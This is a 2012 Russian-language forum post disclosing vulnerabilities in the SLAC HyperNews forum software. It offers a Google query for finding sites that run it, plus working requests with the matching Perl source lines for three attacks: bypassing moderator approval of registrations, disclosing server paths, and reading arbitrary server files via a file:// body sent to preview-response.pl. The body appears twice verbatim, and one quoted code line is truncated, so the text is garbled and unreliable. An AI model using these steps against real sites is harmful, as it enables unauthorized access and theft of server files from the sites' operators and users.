dannote
19.06.2012, 15:28
Сайт CMS: http://hypernews.slac.stanford.edu/hn/download/
Сайты на SLAC HyperNews:
https://www.google.ru/search?q="This+site+runs+SLAC+HyperNews" (https://www.google.ru/search?q=%22This+site+runs+SLAC+HyperNews%22)
1. Подтверждение регистрации на премодерируемых форумах:
http://[Ссылка для подтверждения]&AdminID=1&Approved=yes
validate-email.pl line 34-35:
Code:
my $adminid = $in{'AdminID'};
my $approved = $in{'Approved'};
validate-email.pl line 240-249:
Code:
if ($moderateMembership == 1 && $adminid ne "" && $approved eq "yes" ) {
print "
The approval email has been sent to the user. Thanks!" if $Email;
print "
The account has been activated. User $userid does not have an email address. Please inform $userid that his or her account is ready. " if !$Email;
} else {
print "\nCongratulations! Your account '$userid' has been approved and activated. An email will be sent to you for the record.";
print qq {
$ins
};
}
2. Раскрытие путей:
2.1 $hndocs
http://[SLAC HyperNews URL]/get/AUX/1
get line 209-221:
Code:
my $base_dir;
if ($URL =~ /^\/AUX\/.*/) {
&HNMsg("[get-11] (get) attachment: $hndocs$base_dir\n") if $debug;
$base_dir = $URL;
} else {
&HNMsg("[get-12] (get) base urc file: $hndocs$base_dir.html,urc\n") if $debug;
$base_dir = url2forum($URL);
}
#_________________________________________________ __________________
# One global to hold the forum that the message is in.
$the_forum = HN::Message->get($base_dir);
2.2 $hnPeople
См. 3
3. Чтение произвольных файлов.
http://[SLAC HyperNews URL]/preview-response.pl => POST-запрос с параметром contentType=URL и body=file://[file]
preview-response.pl line 160-171:
Code:
if ($contentType eq 'URL' && $body =~ /^file:/) {
&HNMsg("[pvres-7] (PreviewResponsePL) Open URL file ") if $debug;
$contentType = "Plain Text";
($body) = split("\n",$body);
$body =~ s/[ \t\n]+//g;
if (open(EXTFILE,");
close(EXTFILE);
} else {
&HNError("Cannot open file URL $body\n");
}
} # end of babar
Сайты на SLAC HyperNews:
https://www.google.ru/search?q="This+site+runs+SLAC+HyperNews" (https://www.google.ru/search?q=%22This+site+runs+SLAC+HyperNews%22)
1. Подтверждение регистрации на премодерируемых форумах:
http://[Ссылка для подтверждения]&AdminID=1&Approved=yes
validate-email.pl line 34-35:
Code:
my $adminid = $in{'AdminID'};
my $approved = $in{'Approved'};
validate-email.pl line 240-249:
Code:
if ($moderateMembership == 1 && $adminid ne "" && $approved eq "yes" ) {
print "
The approval email has been sent to the user. Thanks!" if $Email;
print "
The account has been activated. User $userid does not have an email address. Please inform $userid that his or her account is ready. " if !$Email;
} else {
print "\nCongratulations! Your account '$userid' has been approved and activated. An email will be sent to you for the record.";
print qq {
$ins
};
}
2. Раскрытие путей:
2.1 $hndocs
http://[SLAC HyperNews URL]/get/AUX/1
get line 209-221:
Code:
my $base_dir;
if ($URL =~ /^\/AUX\/.*/) {
&HNMsg("[get-11] (get) attachment: $hndocs$base_dir\n") if $debug;
$base_dir = $URL;
} else {
&HNMsg("[get-12] (get) base urc file: $hndocs$base_dir.html,urc\n") if $debug;
$base_dir = url2forum($URL);
}
#_________________________________________________ __________________
# One global to hold the forum that the message is in.
$the_forum = HN::Message->get($base_dir);
2.2 $hnPeople
См. 3
3. Чтение произвольных файлов.
http://[SLAC HyperNews URL]/preview-response.pl => POST-запрос с параметром contentType=URL и body=file://[file]
preview-response.pl line 160-171:
Code:
if ($contentType eq 'URL' && $body =~ /^file:/) {
&HNMsg("[pvres-7] (PreviewResponsePL) Open URL file ") if $debug;
$contentType = "Plain Text";
($body) = split("\n",$body);
$body =~ s/[ \t\n]+//g;
if (open(EXTFILE,");
close(EXTFILE);
} else {
&HNError("Cannot open file URL $body\n");
}
} # end of babar